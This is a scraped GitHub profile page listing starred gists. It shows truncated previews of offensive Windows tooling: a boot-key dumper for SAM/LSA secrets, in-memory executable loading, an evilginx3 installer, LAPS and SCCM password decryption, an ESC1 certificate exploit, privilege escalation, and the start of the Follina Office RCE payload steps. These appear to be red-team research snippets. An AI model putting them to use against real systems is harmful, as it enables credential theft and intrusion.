Skip to content

Instantly share code, notes, and snippets.

View clod81's full-sized avatar
🔐

clod clod81

🔐
54 followers · 197 following
  • Tier Zero Security
View GitHub Profile
@Dfte
Dfte / DumpBootKey.c
Created July 4, 2024 13:49
C code to dump and compute the boot key used to decrypt SAM and LSA secrets.
#include <windows.h>
#include <stdio.h>
#define BOOT_KEY_SIZE 16
#pragma warning(disable: 4996)
void getRegistryClassValue(HKEY rootKey, const char* subKey, char* classValue, DWORD classValueSize) {
HKEY hKey;
LONG result = RegOpenKeyExA(rootKey, subKey, 0, KEY_READ, &hKey);
if (result != ERROR_SUCCESS) {
fprintf(stderr, "Error opening registry key: %ld\n", result);
@SoftPoison
SoftPoison / ime.ps1
Created May 23, 2024 23:50
Runs an executable in-memory
$source = @"
using System;
using System.Runtime.InteropServices;
public class InMemoryExecutable : IDisposable
{
public class DllException : Exception
{
public DllException() : base() { }
public DllException(string message) : base(message) { }
@dunderhay
dunderhay / install_evilginx3.sh
Last active November 15, 2024 13:27
bash script to install evilginx3 on a ubuntu linux host
#!/bin/bash
set -e
GO_VERSION="1.22.3"
GO_URL="https://go.dev/dl/go${GO_VERSION}.linux-amd64.tar.gz"
EXPECTED_CHECKSUM="8920ea521bad8f6b7bc377b4824982e011c19af27df88a815e3586ea895f1b36"
# Log output of script
exec > >(tee -i /home/ubuntu/install.log)
exec 2>&1
@xpn
xpn / AADLAPS_Request.txt
Last active January 30, 2024 10:34
GET /beta/deviceLocalCredentials/[DEVICE-ID]?$select=credentials HTTP/1.1
ocp-client-version: 1.0
client-request-id: 96cbfa59-dbfc-4a92-b261-7f77bd8f4b9b
ocp-client-name: Get-LapsAADPassword Windows LAPS Cmdlet
User-Agent: Mozilla/5.0 (Windows NT 10.0; Microsoft Windows 10.0.22621; en-US) PowerShell/5.1.22621.963 Invoke-MgGraphRequest
SdkVersion: graph-powershell/1.26.0, Graph-dotnet-1.25.1
FeatureFlag: 00000047
Cache-Control: no-store, no-cache
Authorization: Bearer [AAD-JWT-HERE]
Accept-Encoding: gzip
@xpn
xpn / LAPSDecrypt.cs
Last active October 11, 2024 18:16
Quick POC looking at how encryption works for LAPS (v2)
using System;
using System.Collections.Generic;
using System.DirectoryServices.Protocols;
using System.Globalization;
using System.Linq;
using System.Runtime.InteropServices;
using System.Runtime.InteropServices.ComTypes;
using System.Security.Policy;
using System.Security.Principal;
using System.Text;
@b4cktr4ck2
b4cktr4ck2 / esc1.ps1
Created February 22, 2023 21:50
PowerShell script to exploit ESC1/retrieve your own NTLM password hash.
#Thank you @NotMedic for troubleshooting/validating stuff!
$password = Read-Host -Prompt "Enter Password"
#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time!
$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now.
$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored?
$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box.
$CASERVER = "alexlab-dc01-ca" #CA name.
$CA = $CAFQDN + "\" + $CASERVER
@Dump-GUY
Dump-GUY / Program.cs
Last active June 21, 2024 21:08
Example of DynamicCompiler - dynamically compile C# code -> but it actually spawns csc.exe
using System;
using System.CodeDom.Compiler;
using Microsoft.CSharp;
using System.Linq;
namespace DynamicCompiler
{
internal class Program
{
public static void DynamicRun(string codes, string clazz, string method, string[] args)
@antonioCoco
antonioCoco / TcbElevation.cpp
Last active October 11, 2024 20:15
// TcbElevation - Authors: @splinter_code and @decoder_it
#define SECURITY_WIN32
#include <windows.h>
#include <sspi.h>
#include <stdio.h>
#pragma comment(lib, "Secur32.lib")
void EnableTcbPrivilege(BOOL enforceCheck);
@xpn
xpn / sccmdecryptpoc.cs
Last active October 31, 2024 15:19
SCCM Account Password Decryption POC
// Twitter thread: https://twitter.com/_xpn_/status/1543682652066258946 (was a bit bored ;)
// Needs to be run on the SCCM server containing the "Microsoft Systems Management Server" CSP for it to work.
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
namespace SCCMDecryptPOC
{
internal class Program
@tothi
tothi / ms-msdt.MD
Last active September 29, 2024 08:10
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.